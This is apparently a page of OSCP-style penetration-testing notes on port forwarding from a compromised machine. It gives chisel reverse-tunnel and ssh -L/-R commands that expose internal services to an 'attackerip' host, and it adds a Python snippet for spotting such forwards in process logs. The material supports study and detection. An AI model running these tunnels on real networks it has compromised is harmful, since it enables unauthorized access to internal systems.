
# Port Forwarding

Port forwarding is a technique in which a service running on the target machine, or on any other machine on its network, is forwarded to the attacker's machine so that it can be accessed locally.

Commonly used tools:

* Chisel
* SSH

### Local Port Forwarding

Local port forwarding transfers a service running on the compromised machine to the attacker's machine.

#### Chisel

**Attacker's Machine:**

```bash
./chisel server -p 1337 --reverse
```

**Compromised Machine:**

```bash
# Forward the service on port 5000 of the compromised machine to port 5000 on the attacker's machine
./chisel client attackerip:1337 R:5000:127.0.0.1:5000
```

#### SSH

```bash
# The same with SSH
# Format: ssh -L attackermachineport:127.0.0.1:targetserviceport user@target
ssh -L 5000:127.0.0.1:5000 user@targetIP
```

### Remote Port Forwarding

Remote port forwarding transfers a service running on a machine that is present in the same network as the compromised machine to the attacker's machine.

{% hint style="success" %}
**Network Setup:**

Machine A : Attacker's Machine

Machine B : Compromised Machine ( Has a network card to communicate with Y network )

Machine C : Machine on Y network\
\
A ---> B ( Attacker can communicate with the Machine B )

B ---> C ( Machine B can communicate with both A and C with different network cards )

A --x-> C ( Attacker cannot communicate with C since they are
{% endhint %}

#### Chisel

**Attacker's Machine:**

```bash
./chisel server -p 9001 --reverse
```

**Compromised Machine ( Machine B ):**

```bash
# Machine C has a service on its port 3000 which has to be forwarded to port 3000 on the attacker's machine
# Reverse remote format: R:<attacker-listen-port>:<destination-host>:<destination-port>
./chisel client attackerip:9001 R:3000:machineCIP:3000
```

#### SSH

```bash
# The same can be performed with SSH
# Format: ssh -R [REMOTE:]REMOTE_PORT:DESTINATION:DESTINATION_PORT [USER@]SSH_SERVER
# Run on Machine B: -R opens REMOTE_PORT on the SSH server, so the server must be the attacker's machine
ssh -R 3000:machineCIP:3000 user@attackerip
```
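For reviewing process-creation logs (auditd, Sysmon and similar) for the forwards described on this page, the following added example, which is not part of the original page, parses `ssh -L`/`-R` and chisel `R:` arguments and reports which side opens the listener. The names `SAMPLES`, `split_spec` and `find_forwards` are hypothetical, the sample command lines are constructed, and IPv6 literals are not handled.

```python
import shlex

# Constructed process-creation command lines (placeholders, not real hosts).
SAMPLES = [
    "ssh -L 5000:127.0.0.1:5000 user@targetIP",
    "ssh -R 3000:machineCIP:3000 user@attackerip",
    "./chisel client attackerip:9001 R:3000:machineCIP:3000",
    "./chisel client attackerip:9001 R:3000:127.0.0.1:machineCIP:3000",
    "ssh user@targetIP",
]

def split_spec(spec):
    """Parse [bind:]port:host:hostport; return None if it has another shape."""
    parts = spec.split(":")
    if len(parts) == 3:
        parts.insert(0, "")  # no explicit bind address
    if len(parts) != 4 or not (parts[1].isdigit() and parts[3].isdigit()):
        return None
    return parts[0], int(parts[1]), parts[2], int(parts[3])

def find_forwards(cmdline):
    """Return (tool, listening side, parsed spec) for each forward found."""
    argv = shlex.split(cmdline)
    tool = argv[0].rsplit("/", 1)[-1] if argv else ""
    found = []
    if tool == "ssh":
        for i, arg in enumerate(argv):
            if arg[:2] in ("-L", "-R"):
                # The spec is either attached (-L5000:...) or the next argument.
                spec = arg[2:] or (argv[i + 1] if i + 1 < len(argv) else "")
                # -L opens the listener on the ssh client, -R on the ssh server.
                side = "ssh client" if arg[1] == "L" else "ssh server"
                found.append(("ssh", side, split_spec(spec)))
    elif tool == "chisel" and argv[1:2] == ["client"]:
        for arg in argv[2:]:
            if arg.startswith("R:"):
                # An R: remote opens the listener on the chisel server.
                found.append(("chisel", "chisel server", split_spec(arg[2:])))
    return found

if __name__ == "__main__":
    for line in SAMPLES:
        print(line, "->", find_forwards(line) or "no forward")
```

A spec of `None` marks a forward whose argument does not have the three- or four-field shape, such as the five-field chisel remote in the fourth sample.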

### Dynamic Port Forwarding

Dynamic port forwarding is a pivoting technique that gives the attacker full access to the services running on the compromised system through proxychains.

{% content-ref url="/pages/BWruI2SsPn0H4sQs38M1" %}
[Pivoting ( ProxyChains )](/oscp-2022/linux-post-exploitation/pivoting-proxychains.md)
{% endcontent-ref %}

